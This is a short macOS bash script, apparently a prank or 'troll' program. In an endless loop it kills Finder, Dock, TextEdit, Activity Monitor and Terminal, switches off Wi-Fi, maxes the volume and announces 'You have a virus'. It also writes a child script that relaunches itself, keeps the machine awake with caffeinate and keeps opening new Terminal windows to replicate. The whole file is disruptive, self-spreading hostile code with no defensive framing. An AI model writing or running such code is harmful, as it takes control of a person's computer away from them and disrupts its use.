#!/bin/bash
while true; do
#Kill Finder & Dock, to make it harder to launch new applications
killall Finder
killall Dock
#kill TextEdit so you can't edit the scripts?
killall TextEdit
#Kill Activity Monitor, so you can't quit applications
killall "Activity Monitor"
#kill terminal
killall Terminal
#Kill wifi, just for fun
networksetup -setairportpower en1 off
#Make an error sound
osascript -e 'beep'
#Set the volume to max, then say "You have a virus"
osascript -e "set volume 7"
say You have a virus
#Check if it's parent, and if it is, caffeinate computer
if [ $1 = "1" ]; then
  echo "#!/bin/bash" >> child
  echo "nohup sh -c '$PWD/trollingnl'" >> child
  chmod +x ./child
  open -a Terminal.app ~/child
  caffeinate
fi
#Self-replicate
open -a Terminal.app ~/child
done
